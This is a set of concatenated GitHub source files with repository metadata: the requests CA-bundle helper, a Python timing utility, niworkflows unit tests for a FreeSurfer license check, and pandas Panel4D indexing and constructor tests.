more(open(sys.argv[1]).read(), 10)
| {
"content_hash": "ffaf5c8948d3e7f14c9add7a0ae1ad3c",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 53,
"avg_line_length": 20.05263157894737,
"alnum_prop": 0.5223097112860893,
"repo_name": "ordinary-developer/lin_education",
"id": "283ca79bf859bd4e3ca7b3c2d5d565aba51ae846",
"size": "381",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "books/techno/python/programming_python_4_ed_m_lutz/code/chapter_2/06_using_programs_in_two_ways/more.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
certs.py
~~~~~~~~
This module returns the preferred default CA certificate bundle.
If you are packaging Requests, e.g., for a Linux distribution or a managed
environment, you can change the definition of where() to return a separately
packaged CA bundle.
"""
import os.path
certifi = None
try:
import certifi
except ImportError:
pass
def where():
"""Return the preferred certificate bundle."""
if certifi:
return certifi.where()
return os.path.join(os.path.dirname(__file__), 'cacert.pem')
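# A packager could instead return a system bundle here, e.g. (illustrative
# path only): return '/etc/ssl/certs/ca-certificates.crt'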
if __name__ == '__main__':
print(where())
| {
"content_hash": "e065ce162933743dc3072c498fdaa426",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 76,
"avg_line_length": 20.535714285714285,
"alnum_prop": 0.6782608695652174,
"repo_name": "mozilla/firefox-flicks",
"id": "81482767b3681dee10ec6ac45229c5c6ad722857",
"size": "622",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "vendor-local/lib/python/requests/certs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "68358"
},
{
"name": "HTML",
"bytes": "337116"
},
{
"name": "JavaScript",
"bytes": "44816"
},
{
"name": "Puppet",
"bytes": "6653"
},
{
"name": "Python",
"bytes": "4166155"
},
{
"name": "Shell",
"bytes": "2409"
}
],
"symlink_target": ""
} |
import time
class Chrono:
"""
A utility class to compute elapsed time.
Typical usage:
c = Chrono().on()
...
print "elapsed time: %.1fs" % c.off()
"""
def __init__(self, nbDigit=1):
self.t0 = None
self.nbDigit = nbDigit
def on(self):
self.t0 = time.time()
return self
def get(self):
t = time.time()
return round(t - self.t0, self.nbDigit)
def off(self):
t = time.time()
return round(t - self.t0, self.nbDigit)
#--- obsolete interface
ltChrono = []
#Start a chronometer; you can start several of them (they must be stopped in nested order)
def chronoOn(name=None):
global ltChrono
c = Chrono().on()
ltChrono.append((c,name))
#stop the last started chronometer and return its value in seconds
def chronoOff(expected_name=None):
global ltChrono
c,name = ltChrono.pop()
assert name == expected_name, (
"INTERNAL ERROR: chronoOn and chronoOff calls not properly nested."
" Got '%s' instead of '%s'. Stack is: %s") % (
name, expected_name, [_n for _,_n in ltChrono])
return c.off()
def pretty_time_delta(seconds):
seconds = int(seconds)
days, seconds = divmod(seconds, 86400)
hours, seconds = divmod(seconds, 3600)
minutes, seconds = divmod(seconds, 60)
if days > 0:
return '%dd %dh %dmin %ds' % (days, hours, minutes, seconds)
elif hours > 0:
return '%dh %dmin %ds' % (hours, minutes, seconds)
elif minutes > 0:
return '%dmin %ds' % (minutes, seconds)
else:
return '%ds' % (seconds,)
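# e.g. pretty_time_delta(93784) -> '1d 2h 3min 4s'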
#---------- SELF-TEST --------------
if __name__ == "__main__":
print ("Selft-test")
chronoOn()
time.sleep(1)
v = chronoOff()
print (v==1, v)
chronoOn()
time.sleep(1)
chronoOn()
time.sleep(2.2)
v = chronoOff()
print (v == 2.2, v)
c = Chrono().on()
print("elapsed time: %.1fs" % c.off())
# v = chronoOff(2)
# print abs(round(v-3)) < 0.5, v
| {
"content_hash": "b159786964c4071f014fd7d78dbd2c41",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 71,
"avg_line_length": 22.80952380952381,
"alnum_prop": 0.581419624217119,
"repo_name": "Transkribus/TranskribusDU",
"id": "5113b4cb1b79723b6f7c93d4774f37a68f6fd2ad",
"size": "2022",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "TranskribusDU/common/chrono.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "2140"
},
{
"name": "HTML",
"bytes": "7987"
},
{
"name": "Python",
"bytes": "3804398"
},
{
"name": "Shell",
"bytes": "2069"
}
],
"symlink_target": ""
} |
"""Test misc module."""
import os
import shutil
from unittest import mock
import pytest
from ..misc import pass_dummy_scans, check_valid_fs_license
@pytest.mark.parametrize(
"algo_dummy_scans,dummy_scans,expected_out", [(2, 1, 1), (2, None, 2), (2, 0, 0)]
)
def test_pass_dummy_scans(algo_dummy_scans, dummy_scans, expected_out):
"""Check dummy scans passing."""
skip_vols = pass_dummy_scans(algo_dummy_scans, dummy_scans)
assert skip_vols == expected_out
@pytest.mark.parametrize(
"stdout,rc,valid",
[
(b"Successful command", 0, True),
(b"", 0, True),
(b"ERROR: FreeSurfer license file /made/up/license.txt not found", 1, False),
(b"Failed output", 1, False),
(b"ERROR: Systems running GNU glibc version greater than 2.15", 0, False),
],
)
def test_fs_license_check(stdout, rc, valid):
with mock.patch("subprocess.run") as mocked_run:
mocked_run.return_value.stdout = stdout
mocked_run.return_value.returncode = rc
assert check_valid_fs_license() is valid
@pytest.mark.skipif(not os.getenv("FS_LICENSE"), reason="No FS license found")
def test_fs_license_check2(monkeypatch):
"""Execute the canary itself."""
assert check_valid_fs_license() is True
@pytest.mark.skipif(shutil.which('mri_convert') is None, reason="FreeSurfer not installed")
def test_fs_license_check3(monkeypatch):
with monkeypatch.context() as m:
m.delenv("FS_LICENSE", raising=False)
m.delenv("FREESURFER_HOME", raising=False)
assert check_valid_fs_license() is False
| {
"content_hash": "189509050dfd9f22118d9a987658ddef",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 91,
"avg_line_length": 32.916666666666664,
"alnum_prop": 0.670253164556962,
"repo_name": "oesteban/niworkflows",
"id": "dc7d781744e60c507922c9d5a65e2e587e7d4f89",
"size": "2459",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "niworkflows/utils/tests/test_misc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "11035"
},
{
"name": "HTML",
"bytes": "500"
},
{
"name": "Makefile",
"bytes": "413"
},
{
"name": "Python",
"bytes": "791805"
},
{
"name": "Shell",
"bytes": "1717"
},
{
"name": "Smarty",
"bytes": "5875"
}
],
"symlink_target": ""
} |
from datetime import datetime
from pandas.compat import range, lrange
import os
import operator
import nose
import numpy as np
from pandas import Series, DataFrame, Index, isnull, notnull, pivot, MultiIndex
from pandas.core.datetools import bday
from pandas.core.panel import Panel
from pandas.core.panel4d import Panel4D
from pandas.core.series import remove_na
import pandas.core.common as com
import pandas.core.panel as panelmod
from pandas import compat
from pandas.util.testing import (assert_panel_equal,
assert_panel4d_equal,
assert_frame_equal,
assert_series_equal,
assert_almost_equal)
import pandas.util.testing as tm
def add_nans(panel4d):
for l, label in enumerate(panel4d.labels):
panel = panel4d[label]
tm.add_nans(panel)
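# add_nans salts every contained panel with NaNs so the skipna code paths of
# the stat ops exercised below actually see missing data.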
class SafeForLongAndSparse(object):
_multiprocess_can_split_ = True
def test_repr(self):
foo = repr(self.panel4d)
def test_iter(self):
tm.equalContents(list(self.panel4d), self.panel4d.labels)
def test_count(self):
f = lambda s: notnull(s).sum()
self._check_stat_op('count', f, obj=self.panel4d, has_skipna=False)
def test_sum(self):
self._check_stat_op('sum', np.sum)
def test_mean(self):
self._check_stat_op('mean', np.mean)
def test_prod(self):
self._check_stat_op('prod', np.prod)
def test_median(self):
def wrapper(x):
if isnull(x).any():
return np.nan
return np.median(x)
self._check_stat_op('median', wrapper)
def test_min(self):
self._check_stat_op('min', np.min)
def test_max(self):
self._check_stat_op('max', np.max)
def test_skew(self):
try:
from scipy.stats import skew
except ImportError:
raise nose.SkipTest("no scipy.stats.skew")
def this_skew(x):
if len(x) < 3:
return np.nan
return skew(x, bias=False)
self._check_stat_op('skew', this_skew)
# def test_mad(self):
# f = lambda x: np.abs(x - x.mean()).mean()
# self._check_stat_op('mad', f)
def test_var(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.var(x, ddof=1)
self._check_stat_op('var', alt)
def test_std(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.std(x, ddof=1)
self._check_stat_op('std', alt)
def test_sem(self):
def alt(x):
if len(x) < 2:
return np.nan
return np.std(x, ddof=1)/np.sqrt(len(x))
self._check_stat_op('sem', alt)
# def test_skew(self):
# from scipy.stats import skew
# def alt(x):
# if len(x) < 3:
# return np.nan
# return skew(x, bias=False)
# self._check_stat_op('skew', alt)
def _check_stat_op(self, name, alternative, obj=None, has_skipna=True):
if obj is None:
obj = self.panel4d
# # set some NAs
# obj.ix[5:10] = np.nan
# obj.ix[15:20, -2:] = np.nan
f = getattr(obj, name)
if has_skipna:
def skipna_wrapper(x):
nona = remove_na(x)
if len(nona) == 0:
return np.nan
return alternative(nona)
def wrapper(x):
return alternative(np.asarray(x))
for i in range(obj.ndim):
result = f(axis=i, skipna=False)
assert_panel_equal(result, obj.apply(wrapper, axis=i))
else:
skipna_wrapper = alternative
wrapper = alternative
for i in range(obj.ndim):
result = f(axis=i)
if not tm._incompat_bottleneck_version(name):
assert_panel_equal(result, obj.apply(skipna_wrapper, axis=i))
self.assertRaises(Exception, f, axis=obj.ndim)
class SafeForSparse(object):
_multiprocess_can_split_ = True
@classmethod
def assert_panel_equal(cls, x, y):
assert_panel_equal(x, y)
@classmethod
def assert_panel4d_equal(cls, x, y):
assert_panel4d_equal(x, y)
def test_get_axis(self):
assert(self.panel4d._get_axis(0) is self.panel4d.labels)
assert(self.panel4d._get_axis(1) is self.panel4d.items)
assert(self.panel4d._get_axis(2) is self.panel4d.major_axis)
assert(self.panel4d._get_axis(3) is self.panel4d.minor_axis)
def test_set_axis(self):
new_labels = Index(np.arange(len(self.panel4d.labels)))
new_items = Index(np.arange(len(self.panel4d.items)))
new_major = Index(np.arange(len(self.panel4d.major_axis)))
new_minor = Index(np.arange(len(self.panel4d.minor_axis)))
# ensure this propagates to potentially prior-cached items too
label = self.panel4d['l1']
self.panel4d.labels = new_labels
if hasattr(self.panel4d, '_item_cache'):
self.assertNotIn('l1', self.panel4d._item_cache)
self.assertIs(self.panel4d.labels, new_labels)
self.panel4d.major_axis = new_major
self.assertIs(self.panel4d[0].major_axis, new_major)
self.assertIs(self.panel4d.major_axis, new_major)
self.panel4d.minor_axis = new_minor
self.assertIs(self.panel4d[0].minor_axis, new_minor)
self.assertIs(self.panel4d.minor_axis, new_minor)
def test_get_axis_number(self):
self.assertEqual(self.panel4d._get_axis_number('labels'), 0)
self.assertEqual(self.panel4d._get_axis_number('items'), 1)
self.assertEqual(self.panel4d._get_axis_number('major'), 2)
self.assertEqual(self.panel4d._get_axis_number('minor'), 3)
def test_get_axis_name(self):
self.assertEqual(self.panel4d._get_axis_name(0), 'labels')
self.assertEqual(self.panel4d._get_axis_name(1), 'items')
self.assertEqual(self.panel4d._get_axis_name(2), 'major_axis')
self.assertEqual(self.panel4d._get_axis_name(3), 'minor_axis')
def test_arith(self):
self._test_op(self.panel4d, operator.add)
self._test_op(self.panel4d, operator.sub)
self._test_op(self.panel4d, operator.mul)
self._test_op(self.panel4d, operator.truediv)
self._test_op(self.panel4d, operator.floordiv)
self._test_op(self.panel4d, operator.pow)
self._test_op(self.panel4d, lambda x, y: y + x)
self._test_op(self.panel4d, lambda x, y: y - x)
self._test_op(self.panel4d, lambda x, y: y * x)
self._test_op(self.panel4d, lambda x, y: y / x)
self._test_op(self.panel4d, lambda x, y: y ** x)
self.assertRaises(Exception, self.panel4d.__add__, self.panel4d['l1'])
@staticmethod
def _test_op(panel4d, op):
result = op(panel4d, 1)
assert_panel_equal(result['l1'], op(panel4d['l1'], 1))
def test_keys(self):
tm.equalContents(list(self.panel4d.keys()), self.panel4d.labels)
def test_iteritems(self):
"""Test panel4d.iteritems()"""
self.assertEqual(len(list(compat.iteritems(self.panel4d))),
len(self.panel4d.labels))
def test_combinePanel4d(self):
result = self.panel4d.add(self.panel4d)
self.assert_panel4d_equal(result, self.panel4d * 2)
def test_neg(self):
self.assert_panel4d_equal(-self.panel4d, self.panel4d * -1)
def test_select(self):
p = self.panel4d
# select labels
result = p.select(lambda x: x in ('l1', 'l3'), axis='labels')
expected = p.reindex(labels=['l1', 'l3'])
self.assert_panel4d_equal(result, expected)
# select items
result = p.select(lambda x: x in ('ItemA', 'ItemC'), axis='items')
expected = p.reindex(items=['ItemA', 'ItemC'])
self.assert_panel4d_equal(result, expected)
# select major_axis
result = p.select(lambda x: x >= datetime(2000, 1, 15), axis='major')
new_major = p.major_axis[p.major_axis >= datetime(2000, 1, 15)]
expected = p.reindex(major=new_major)
self.assert_panel4d_equal(result, expected)
# select minor_axis
result = p.select(lambda x: x in ('D', 'A'), axis=3)
expected = p.reindex(minor=['A', 'D'])
self.assert_panel4d_equal(result, expected)
# corner case, empty thing
result = p.select(lambda x: x in ('foo',), axis='items')
self.assert_panel4d_equal(result, p.reindex(items=[]))
def test_get_value(self):
for item in self.panel.items:
for mjr in self.panel.major_axis[::2]:
for mnr in self.panel.minor_axis:
result = self.panel.get_value(item, mjr, mnr)
expected = self.panel[item][mnr][mjr]
assert_almost_equal(result, expected)
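# NB: TestPanel4d lists CheckIndexing before SafeForSparse, so CheckIndexing's
# test_get_value (which uses self.panel4d) shadows this one in the MRO and the
# self.panel reference above never actually runs.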
def test_abs(self):
result = self.panel4d.abs()
expected = np.abs(self.panel4d)
self.assert_panel4d_equal(result, expected)
p = self.panel4d['l1']
result = p.abs()
expected = np.abs(p)
assert_panel_equal(result, expected)
df = p['ItemA']
result = df.abs()
expected = np.abs(df)
assert_frame_equal(result, expected)
class CheckIndexing(object):
_multiprocess_can_split_ = True
def test_getitem(self):
self.assertRaises(Exception, self.panel4d.__getitem__, 'ItemQ')
def test_delitem_and_pop(self):
expected = self.panel4d['l2']
result = self.panel4d.pop('l2')
assert_panel_equal(expected, result)
self.assertNotIn('l2', self.panel4d.labels)
del self.panel4d['l3']
self.assertNotIn('l3', self.panel4d.labels)
self.assertRaises(Exception, self.panel4d.__delitem__, 'l3')
values = np.empty((4, 4, 4, 4))
values[0] = 0
values[1] = 1
values[2] = 2
values[3] = 3
panel4d = Panel4D(values, lrange(4), lrange(4), lrange(4), lrange(4))
# did we delete the right row?
panel4dc = panel4d.copy()
del panel4dc[0]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[1]
assert_panel_equal(panel4dc[0], panel4d[0])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[2]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[0], panel4d[0])
assert_panel_equal(panel4dc[3], panel4d[3])
panel4dc = panel4d.copy()
del panel4dc[3]
assert_panel_equal(panel4dc[1], panel4d[1])
assert_panel_equal(panel4dc[2], panel4d[2])
assert_panel_equal(panel4dc[0], panel4d[0])
def test_setitem(self):
## LongPanel with one item
# lp = self.panel.filter(['ItemA', 'ItemB']).to_frame()
# self.assertRaises(Exception, self.panel.__setitem__,
# 'ItemE', lp)
# Panel
p = Panel(dict(
ItemA=self.panel4d['l1']['ItemA'][2:].filter(items=['A', 'B'])))
self.panel4d['l4'] = p
self.panel4d['l5'] = p
p2 = self.panel4d['l4']
assert_panel_equal(p, p2.reindex(items=p.items,
major_axis=p.major_axis,
minor_axis=p.minor_axis))
# scalar
self.panel4d['lG'] = 1
self.panel4d['lE'] = True
self.assertEqual(self.panel4d['lG'].values.dtype, np.int64)
self.assertEqual(self.panel4d['lE'].values.dtype, np.bool_)
# object dtype
self.panel4d['lQ'] = 'foo'
self.assertEqual(self.panel4d['lQ'].values.dtype, np.object_)
# boolean dtype
self.panel4d['lP'] = self.panel4d['l1'] > 0
self.assertEqual(self.panel4d['lP'].values.dtype, np.bool_)
def test_setitem_by_indexer(self):
# Panel
panel4dc = self.panel4d.copy()
p = panel4dc.iloc[0]
def func():
self.panel4d.iloc[0] = p
self.assertRaises(NotImplementedError, func)
# DataFrame
panel4dc = self.panel4d.copy()
df = panel4dc.iloc[0,0]
df.iloc[:] = 1
panel4dc.iloc[0,0] = df
self.assertTrue((panel4dc.iloc[0,0].values == 1).all())
# Series
panel4dc = self.panel4d.copy()
s = panel4dc.iloc[0,0,:,0]
s.iloc[:] = 1
panel4dc.iloc[0,0,:,0] = s
self.assertTrue((panel4dc.iloc[0,0,:,0].values == 1).all())
# scalar
panel4dc = self.panel4d.copy()
panel4dc.iloc[0] = 1
panel4dc.iloc[1] = True
panel4dc.iloc[2] = 'foo'
self.assertTrue((panel4dc.iloc[0].values == 1).all())
self.assertTrue(panel4dc.iloc[1].values.all())
self.assertTrue((panel4dc.iloc[2].values == 'foo').all())
def test_setitem_by_indexer_mixed_type(self):
# GH 8702
self.panel4d['foo'] = 'bar'
# scalar
panel4dc = self.panel4d.copy()
panel4dc.iloc[0] = 1
panel4dc.iloc[1] = True
panel4dc.iloc[2] = 'foo'
self.assertTrue((panel4dc.iloc[0].values == 1).all())
self.assertTrue(panel4dc.iloc[1].values.all())
self.assertTrue((panel4dc.iloc[2].values == 'foo').all())
def test_comparisons(self):
p1 = tm.makePanel4D()
p2 = tm.makePanel4D()
tp = p1.reindex(labels=p1.labels + ['foo'])
p = p1[p1.labels[0]]
def test_comp(func):
result = func(p1, p2)
self.assert_numpy_array_equal(result.values,
func(p1.values, p2.values))
# versus non-indexed same objs
self.assertRaises(Exception, func, p1, tp)
# versus different objs
self.assertRaises(Exception, func, p1, p)
result3 = func(self.panel4d, 0)
self.assert_numpy_array_equal(result3.values,
func(self.panel4d.values, 0))
test_comp(operator.eq)
test_comp(operator.ne)
test_comp(operator.lt)
test_comp(operator.gt)
test_comp(operator.ge)
test_comp(operator.le)
def test_setitem_ndarray(self):
raise nose.SkipTest("skipping for now")
# from pandas import DateRange, datetools
# timeidx = DateRange(start=datetime(2009,1,1),
# end=datetime(2009,12,31),
# offset=datetools.MonthEnd())
# lons_coarse = np.linspace(-177.5, 177.5, 72)
# lats_coarse = np.linspace(-87.5, 87.5, 36)
# P = Panel(items=timeidx, major_axis=lons_coarse, minor_axis=lats_coarse)
# data = np.random.randn(72*36).reshape((72,36))
# key = datetime(2009,2,28)
# P[key] = data#
# assert_almost_equal(P[key].values, data)
def test_major_xs(self):
ref = self.panel4d['l1']['ItemA']
idx = self.panel4d.major_axis[5]
xs = self.panel4d.major_xs(idx)
assert_series_equal(xs['l1'].T['ItemA'], ref.xs(idx), check_names=False)
# not contained
idx = self.panel4d.major_axis[0] - bday
self.assertRaises(Exception, self.panel4d.major_xs, idx)
def test_major_xs_mixed(self):
self.panel4d['l4'] = 'foo'
xs = self.panel4d.major_xs(self.panel4d.major_axis[0])
self.assertEqual(xs['l1']['A'].dtype, np.float64)
self.assertEqual(xs['l4']['A'].dtype, np.object_)
def test_minor_xs(self):
ref = self.panel4d['l1']['ItemA']
idx = self.panel4d.minor_axis[1]
xs = self.panel4d.minor_xs(idx)
assert_series_equal(xs['l1'].T['ItemA'], ref[idx], check_names=False)
# not contained
self.assertRaises(Exception, self.panel4d.minor_xs, 'E')
def test_minor_xs_mixed(self):
self.panel4d['l4'] = 'foo'
xs = self.panel4d.minor_xs('D')
self.assertEqual(xs['l1'].T['ItemA'].dtype, np.float64)
self.assertEqual(xs['l4'].T['ItemA'].dtype, np.object_)
def test_xs(self):
l1 = self.panel4d.xs('l1', axis=0)
expected = self.panel4d['l1']
assert_panel_equal(l1, expected)
# view if possible
l1_view = self.panel4d.xs('l1', axis=0)
l1_view.values[:] = np.nan
self.assertTrue(np.isnan(self.panel4d['l1'].values).all())
# mixed-type
self.panel4d['strings'] = 'foo'
result = self.panel4d.xs('D', axis=3)
self.assertIsNotNone(result.is_copy)
def test_getitem_fancy_labels(self):
panel4d = self.panel4d
labels = panel4d.labels[[1, 0]]
items = panel4d.items[[1, 0]]
dates = panel4d.major_axis[::2]
cols = ['D', 'C', 'F']
# all 4 specified
assert_panel4d_equal(panel4d.ix[labels, items, dates, cols],
panel4d.reindex(labels=labels, items=items, major=dates, minor=cols))
# 3 specified
assert_panel4d_equal(panel4d.ix[:, items, dates, cols],
panel4d.reindex(items=items, major=dates, minor=cols))
# 2 specified
assert_panel4d_equal(panel4d.ix[:, :, dates, cols],
panel4d.reindex(major=dates, minor=cols))
assert_panel4d_equal(panel4d.ix[:, items, :, cols],
panel4d.reindex(items=items, minor=cols))
assert_panel4d_equal(panel4d.ix[:, items, dates, :],
panel4d.reindex(items=items, major=dates))
# only 1
assert_panel4d_equal(panel4d.ix[:, items, :, :],
panel4d.reindex(items=items))
assert_panel4d_equal(panel4d.ix[:, :, dates, :],
panel4d.reindex(major=dates))
assert_panel4d_equal(panel4d.ix[:, :, :, cols],
panel4d.reindex(minor=cols))
def test_getitem_fancy_slice(self):
pass
def test_getitem_fancy_ints(self):
pass
def test_getitem_fancy_xs(self):
raise nose.SkipTest("skipping for now")
# self.assertRaises(NotImplementedError, self.panel4d.major_xs)
# self.assertRaises(NotImplementedError, self.panel4d.minor_xs)
def test_get_value(self):
for label in self.panel4d.labels:
for item in self.panel4d.items:
for mjr in self.panel4d.major_axis[::2]:
for mnr in self.panel4d.minor_axis:
result = self.panel4d.get_value(
label, item, mjr, mnr)
expected = self.panel4d[label][item][mnr][mjr]
assert_almost_equal(result, expected)
def test_set_value(self):
for label in self.panel4d.labels:
for item in self.panel4d.items:
for mjr in self.panel4d.major_axis[::2]:
for mnr in self.panel4d.minor_axis:
self.panel4d.set_value(label, item, mjr, mnr, 1.)
assert_almost_equal(
self.panel4d[label][item][mnr][mjr], 1.)
# resize
res = self.panel4d.set_value('l4', 'ItemE', 'foo', 'bar', 1.5)
tm.assertIsInstance(res, Panel4D)
self.assertIsNot(res, self.panel4d)
self.assertEqual(res.get_value('l4', 'ItemE', 'foo', 'bar'), 1.5)
res3 = self.panel4d.set_value('l4', 'ItemE', 'foobar', 'baz', 5)
self.assertTrue(com.is_float_dtype(res3['l4'].values))
class TestPanel4d(tm.TestCase, CheckIndexing, SafeForSparse,
SafeForLongAndSparse):
_multiprocess_can_split_ = True
@classmethod
def assert_panel4d_equal(cls, x, y):
assert_panel4d_equal(x, y)
def setUp(self):
self.panel4d = tm.makePanel4D(nper=8)
add_nans(self.panel4d)
def test_constructor(self):
# with BlockManager
panel4d = Panel4D(self.panel4d._data)
self.assertIs(panel4d._data, self.panel4d._data)
panel4d = Panel4D(self.panel4d._data, copy=True)
self.assertIsNot(panel4d._data, self.panel4d._data)
assert_panel4d_equal(panel4d, self.panel4d)
# strings handled properly
# panel4d = Panel4D([[['foo', 'foo', 'foo',],
# ['foo', 'foo', 'foo']]])
# self.assertEqual(wp.values.dtype, np.object_)
vals = self.panel4d.values
# no copy
panel4d = Panel4D(vals)
self.assertIs(panel4d.values, vals)
# copy
panel4d = Panel4D(vals, copy=True)
self.assertIsNot(panel4d.values, vals)
# GH #8285, test when scalar data is used to construct a Panel4D
# if dtype is not passed, it should be inferred
value_and_dtype = [(1, 'int64'), (3.14, 'float64'), ('foo', np.object_)]
for (val, dtype) in value_and_dtype:
panel4d = Panel4D(val, labels=range(2), items=range(3), major_axis=range(4), minor_axis=range(5))
vals = np.empty((2, 3, 4, 5), dtype=dtype)
vals.fill(val)
assert_panel4d_equal(panel4d, Panel4D(vals, dtype=dtype))
# test the case when dtype is passed
panel4d = Panel4D(1, labels=range(2), items=range(3), major_axis=range(4), minor_axis=range(5), dtype='float32')
vals = np.empty((2, 3, 4, 5), dtype='float32')
vals.fill(1)
assert_panel4d_equal(panel4d, Panel4D(vals, dtype='float32'))
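# Hedged sketch of the scalar broadcast tested above: a scalar plus explicit
# axes behaves like filling an ndarray of the implied shape, i.e. roughly
#   Panel4D(3.14, labels=range(2), items=range(3),
#           major_axis=range(4), minor_axis=range(5))
#   ~= Panel4D(np.full((2, 3, 4, 5), 3.14))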
def test_constructor_cast(self):
zero_filled = self.panel4d.fillna(0)
casted = Panel4D(zero_filled._data, dtype=int)
casted2 = Panel4D(zero_filled.values, dtype=int)
exp_values = zero_filled.values.astype(int)
assert_almost_equal(casted.values, exp_values)
assert_almost_equal(casted2.values, exp_values)
casted = Panel4D(zero_filled._data, dtype=np.int32)
casted2 = Panel4D(zero_filled.values, dtype=np.int32)
exp_values = zero_filled.values.astype(np.int32)
assert_almost_equal(casted.values, exp_values)
assert_almost_equal(casted2.values, exp_values)
# can't cast
data = [[['foo', 'bar', 'baz']]]
self.assertRaises(ValueError, Panel, data, dtype=float)
def test_constructor_empty_panel(self):
empty = Panel()
self.assertEqual(len(empty.items), 0)
self.assertEqual(len(empty.major_axis), 0)
self.assertEqual(len(empty.minor_axis), 0)
def test_constructor_observe_dtype(self):
# GH #411
panel = Panel(items=lrange(3), major_axis=lrange(3),
minor_axis=lrange(3), dtype='O')
self.assertEqual(panel.values.dtype, np.object_)
def test_consolidate(self):
self.assertTrue(self.panel4d._data.is_consolidated())
self.panel4d['foo'] = 1.
self.assertFalse(self.panel4d._data.is_consolidated())
panel4d = self.panel4d.consolidate()
self.assertTrue(panel4d._data.is_consolidated())
def test_ctor_dict(self):
l1 = self.panel4d['l1']
l2 = self.panel4d['l2']
d = {'A': l1, 'B': l2.ix[['ItemB'], :, :]}
# d2 = {'A' : itema._series, 'B' : itemb[5:]._series}
# d3 = {'A' : DataFrame(itema._series),
# 'B' : DataFrame(itemb[5:]._series)}
panel4d = Panel4D(d)
# wp2 = Panel.from_dict(d2) # nested Dict
# wp3 = Panel.from_dict(d3)
# self.assertTrue(wp.major_axis.equals(self.panel.major_axis))
assert_panel_equal(panel4d['A'], self.panel4d['l1'])
assert_frame_equal(panel4d.ix['B', 'ItemB', :, :],
self.panel4d.ix['l2', ['ItemB'], :, :]['ItemB'])
# intersect
# wp = Panel.from_dict(d, intersect=True)
# self.assertTrue(wp.major_axis.equals(itemb.index[5:]))
# use constructor
# assert_panel_equal(Panel(d), Panel.from_dict(d))
# assert_panel_equal(Panel(d2), Panel.from_dict(d2))
# assert_panel_equal(Panel(d3), Panel.from_dict(d3))
# cast
# dcasted = dict((k, v.reindex(wp.major_axis).fillna(0))
# for k, v in d.iteritems())
# result = Panel(dcasted, dtype=int)
# expected = Panel(dict((k, v.astype(int))
# for k, v in dcasted.iteritems()))
# assert_panel_equal(result, expected)
def test_constructor_dict_mixed(self):
data = dict((k, v.values) for k, v in compat.iteritems(self.panel4d))
result = Panel4D(data)
exp_major = Index(np.arange(len(self.panel4d.major_axis)))
self.assertTrue(result.major_axis.equals(exp_major))
result = Panel4D(data,
labels=self.panel4d.labels,
items=self.panel4d.items,
major_axis=self.panel4d.major_axis,
minor_axis=self.panel4d.minor_axis)
assert_panel4d_equal(result, self.panel4d)
data['l2'] = self.panel4d['l2']
result = Panel4D(data)
assert_panel4d_equal(result, self.panel4d)
# corner, blow up
data['l2'] = data['l2']['ItemB']
self.assertRaises(Exception, Panel4D, data)
data['l2'] = self.panel4d['l2'].values[:, :, :-1]
self.assertRaises(Exception, Panel4D, data)
def test_constructor_resize(self):
data = self.panel4d._data
labels = self.panel4d.labels[:-1]
items = self.panel4d.items[:-1]
major = self.panel4d.major_axis[:-1]
minor = self.panel4d.minor_axis[:-1]
result = Panel4D(data, labels=labels, items=items,
major_axis=major, minor_axis=minor)
expected = self.panel4d.reindex(
labels=labels, items=items, major=major, minor=minor)
assert_panel4d_equal(result, expected)
result = Panel4D(data, items=items, major_axis=major)
expected = self.panel4d.reindex(items=items, major=major)
assert_panel4d_equal(result, expected)
result = Panel4D(data, items=items)
expected = self.panel4d.reindex(items=items)
assert_panel4d_equal(result, expected)
result = Panel4D(data, minor_axis=minor)
expected = self.panel4d.reindex(minor=minor)
assert_panel4d_equal(result, expected)
def test_from_dict_mixed_orient(self):
raise nose.SkipTest("skipping for now")
# df = tm.makeDataFrame()
# df['foo'] = 'bar'
# data = {'k1' : df,
# 'k2' : df}
# panel = Panel.from_dict(data, orient='minor')
# self.assertEqual(panel['foo'].values.dtype, np.object_)
# self.assertEqual(panel['A'].values.dtype, np.float64)
def test_values(self):
self.assertRaises(Exception, Panel, np.random.randn(5, 5, 5),
lrange(5), lrange(5), lrange(4))
def test_conform(self):
p = self.panel4d['l1'].filter(items=['ItemA', 'ItemB'])
conformed = self.panel4d.conform(p)
assert(conformed.items.equals(self.panel4d.labels))
assert(conformed.major_axis.equals(self.panel4d.major_axis))
assert(conformed.minor_axis.equals(self.panel4d.minor_axis))
def test_reindex(self):
ref = self.panel4d['l2']
# labels
result = self.panel4d.reindex(labels=['l1', 'l2'])
assert_panel_equal(result['l2'], ref)
# items
result = self.panel4d.reindex(items=['ItemA', 'ItemB'])
assert_frame_equal(result['l2']['ItemB'], ref['ItemB'])
# major
new_major = list(self.panel4d.major_axis[:10])
result = self.panel4d.reindex(major=new_major)
assert_frame_equal(
result['l2']['ItemB'], ref['ItemB'].reindex(index=new_major))
# raise exception put both major and major_axis
self.assertRaises(Exception, self.panel4d.reindex,
major_axis=new_major, major=new_major)
# minor
new_minor = list(self.panel4d.minor_axis[:2])
result = self.panel4d.reindex(minor=new_minor)
assert_frame_equal(
result['l2']['ItemB'], ref['ItemB'].reindex(columns=new_minor))
result = self.panel4d.reindex(labels=self.panel4d.labels,
items=self.panel4d.items,
major=self.panel4d.major_axis,
minor=self.panel4d.minor_axis)
# don't necessarily copy
result = self.panel4d.reindex()
assert_panel4d_equal(result, self.panel4d)
